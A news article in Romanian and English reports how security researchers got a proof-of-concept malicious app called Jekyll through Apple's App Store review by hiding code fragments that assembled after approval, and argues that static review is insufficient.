Cercetatorii prestigioasei universitati M.I.T. au avut o tentativa de a demonstra ca procesul de revizuire a aplicatiilor pentru App Store nu este chiar atat de sigur precum sustine compania si, conform lor, testul a fost un succes. Ei s-au bazat pe faptul ca programul automat de verificare a aplicatiilor pentru App Store petrece doar cateva secunde verificand aplicatiile, iar asa au reusit sa strecoare in App Store o aplicatie extrem de periculoasa. Ea continea fragmente de cod care se asamblau printr-o comanda data de la distanta, iar dupa asamblare transformau aplicatia intr-o arma foarte periculoasa.
This wasn’t long enough for Apple to notice that an app that purported to offer news from Georgia Tech contained code fragments that later assembled themselves into a malicious digital creature. This malware, which the researchers dubbed Jekyll, could stealthily post tweets, send e-mails and texts, steal personal information and device ID numbers, take photos, and attack other apps. It even provided a way to magnify its effects, because it could direct Safari, Apple’s default browser, to a website with more malware.
O data asamblat codul malware, aplicatia putea trimite singura tweet-uri, putea trimite email-uri sau mesaje text, putea fura informatii personale, seriile de identificare ale terminalelor, putea fura poze si putea ataca alte aplicatii, inclusiv Safari, care era redirectionat catre un website plin de malware. In momentul instalarii aplicatia se conecta singura la serverele cercetatorilor, acestia putand sa ii controleze activitatea dupa bunul plac, putand ataca pe oricine si oricand folosind doar cateva comenzi simple.
The app did a phone-home when it was installed, asking for commands. This gave us the ability to generate new behavior of the logic of that app which was nonexistent when it was installed. The Jekyll app was live for only a few minutes in March, and no innocent victims installed it, Lu says. During that brief time, the researchers installed it on their own Apple devices and attacked themselves, then withdrew the app before it could do real harm. Lu says that by monitoring the app, they could tell that Apple ran it for only a few seconds prior to releasing it. During the review, the malicious code had been decomposed into “code gadgets” that were hidden under the cover of legitimate app operations and could be stitched together after approval.
Aplicatia a fost activa in App Store doar pentru cateva minute, timp in care cercetatorii au descarcat-o si s-au atacat singuri pentru a demonstra functionalitatea ei. Cercetatorii sustin ca in momentul de fata procesul de revizuire a aplicatiilor are la baza doar o verificare statica a codului din aplicatii, iar malware-ul poate fi usor ascuns in operatii logice care tin de funcitonalitatea normala a acestora. Ei vor ca Apple sa isi modifice criteriile de verificare a aplicatiilor, insa probabil acest lucru nu se va intampla.
During the review, the malicious code had been decomposed into “code gadgets” that were hidden under the cover of legitimate app operations and could be stitched together after approval. “The message we want to deliver is that right now, the Apple review process is mostly doing a static analysis of the app, which we say is not sufficient because dynamically generated logic cannot be very easily seen”.